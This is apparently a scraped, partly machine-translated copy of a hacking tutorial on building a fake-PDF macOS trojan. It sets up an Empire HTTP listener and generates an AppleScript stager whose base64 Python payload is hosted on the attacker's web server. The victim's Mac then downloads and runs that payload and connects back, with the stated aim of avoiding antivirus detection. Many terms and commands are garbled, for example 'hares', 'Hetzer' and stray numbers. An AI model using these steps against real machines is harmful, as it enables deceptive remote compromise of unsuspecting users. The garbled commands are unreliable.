<img src = "https://img.wonderhowto.com/img/07/21/63662582578491/0/hacking-macos-create-fake-pdf-trojan-with-applescript-part-1-creating- stager.w1456.jpg "alt =" Hacking macOS: Creating a Fake PDF Trojan with AppleScript, Part 1 (Creating the Stager)  Let me explain in more detail the architecture overview of this attack.
The attacker's system will be so configured to use Empire and host a malicious Python script An AppleScript file is created and displayed as a valid PDF file When the victim opens the AppleScript, it first downloads a genuine PDF and opens it to it to convince them that the fake PDF is indeed genuine, then download the malicious Python script from the attacker's server and execute it, and after the connection is made, a connection between the target Mac and the attacker's server is established Attacker remot the computer
step 2: Creating an Empire HTTP Listener
To begin, change (
cd) to the Empire / directory and use the following command:
Listening Ports on the server of the attacker on which Empire is running. These ports will later be used by the compromised MacBook to connect to the Empire Listener. A new listener is created to receive incoming connections from the MacBook.
To display available listeners, use the following command
On a new Empire installation, there will be no new listeners and "No currently active listeners" will be reported. To keep things simple, a standard HTTP listener can be enabled using the following command
After the listener type has been set,
info can be used. View the available options
There are a few options that (unfortunately) are beyond the scope of this Would blow up article. The standard options are good to follow, but readers are encouraged to play around with the options available and to configure the listeners to best suit their needs.
Next, make sure
port and ] host is set to 80 or 0.0.0.0 as these options for the literal succession are decisive. You can set it with the following two commands. Using a 0.0.0.0 host instructs the Empire listener to be available on every interface. When Empire is used on a local network against a MacBook, the listener is available through the attacker's local IP address (for example, 192.168.0.4). Alternatively, if Empire is installed on a VPS, the listener is accessible to the VPS through the attacker's remote IP address.
Set port 80
Set Host 0.0.0.0
To start the Empire Listener, use the command
execute . It should finally read: "Listener successfully started!"
Listeners command can be used again to verify that the listener was started.
A list of all your active listeners is displayed. Record the listener
Name here. By default, it is automatically set to "http". When testing different listeners while testing Empire, additional listeners can default to "http1" and "http2."
(Empire: Listeners / http)> Listeners access
[*] Active listeners:
Name Module Host Delay / Jitter KillDate
---- ------ ---- ------------ --------
http http: //1x.xxx.xxx.x6: 80 5 / 0.0
(Empire: listeners)> _
That's it to create the listener for this attack. Next, the stager is generated.
Step 3: Create a Malicious MacOS Stager
Stacker, similar to the payloads, are used to connect back to the Empire Listener when they are opened by the victim user. 19659002] To view the available hares, type usestager space, and press tab on the keyboard
usestager <*PRESS TAB*>
There are nearly a dozen dedicated macOS homes ( referred to as "osx") available in Empire. In this article I show how to create an AppleScript stager.
(Empire: Listeners)> usestager
Multi / Bash OSX / Macho Windows / Launcher_bat
Multi / Launcher osx / Macro window / launcher_lnk
multi / macro osx / pkg windows / launcher_sct
multi / pyinstaller osx / safari_launcher windows / launcher_vbs
osx / was osx / teensy windows / launcher_xml
osx / applescript windows / backdoorLnkMacro windows / macro
osx / application window / rabbit window / macroless_msword
osx / ducky windows / csharp_exe window / shellcode
osx / dylib windows / dll windows / teensy
Osx / glass window / Ducky
Osx / Launcher window / hta
(Empire: Listeners)> _
AppleScript is an Apple-developed scripting language. It allows users to directly control scriptable macOS applications as well as parts of macOS itself. Users can create scripts to automate repetitive tasks, combine features from multiple scriptable applications, add new functionality to Mac apps, and create complex workflows. AppleScript is currently included in all versions of macOS as part of a suite of system automation tools.
Do not miss: Use Siri to control iTunes, set your Mac to sleep and more from your iPhone
Generate a MacOS stager in the form of an AppleScript, use the following command:
usestager osx / applescript
Take a look at the available options with
Setting The listener option for the listener server created in the previous step is important. This tells the stager which server to connect to when running the AppleScript on the target MacBook.
(Empire: Listeners)> usestager osx / applescript
(Empire: Hetzer / Osx / Applescript)> Info
Generates AppleScript to run the launcher Empire stage0.
Name Required value Description
---- -------- ----- -----------
Listener True http listener to create a level for.
OutFile False File to output AppleScript, otherwise displayed on the screen.
SafeChecks True True Switch. If you are looking for LittleSnitch or a sandbox, stop the staging process if the value is true. The default value is True.
Language True python Language of the stager to generate.
UserAgent False default User-agent string used for the staging request (defauult, none, or other).
Set the listener option with the following command. The Listener
name should be used here (in this example we use http ).
set listener http
Then generate the AppleScript stager with the
Here I change the generated stager slightly differently than intended. First, understand that the code in the screenshot below is a Base64-encoded Python script. This is the script that will run on the MacBook and connect back to the attacker's server. Instead of embedding the Python script in AppleScript, it is hosted on the attacker's server and downloaded from the victim's computer when the fake PDF is opened.
An AppleScript will continue to be used to download and run the Python script in later steps, but it will not be in the actual AppleScript embedded. If you do this, you can bypass the virus detection because the actual Python script when scanning through VirusTotal does not exist in the fake PDF.
Step 4: Save the macOS Stager
Before the generated Python script can be saved, a new directory must be created. This directory is populated with several files that are important to the attack.
First, open a new terminal and create a directory named
files with the command . mkdir
Then switch to the directory files /
cd files /
The highlighted section in the base64 encoded Python script (see previous step) should be copied and stored in a local file called [ get saved.
Script in the directory files /. This can be achieved with nano .
Nano can be saved and closed by pressing
Ctrl + X then Y then Enter / Return ,
Step 5: Starting a Python3 Web Server
The Python3 server can be started with the following command
python3 -m http. Server 8080 &
Python3 creates a Web server on port 8080 that makes files in the directory accessible to anyone. In this case, we want the
script file containing the encoded Python script to be available to the victim macOS user. The & start the Python3 web server as a background process. Using a VPS is useful to make the server available after the SSH session is closed.
`/ tokyoneon ~ / files
> python3 -m http.server 8080
Serving HTTP to 0.0.0.0 Port 8080 (http://0.0.0.0:8080/) ...
Untangling the macOS Stager
That was to set up the Empire Listener, generate the AppleScript stager, and host the Python script on a web server. In my next article, I'll show how to create an AppleScript to download and silently execute the Python script, and how to make the AppleScript appear as a legitimate PDF.
Cover image of freestocks.org / PEXELS; Screenshots of tokyoneon / zero byte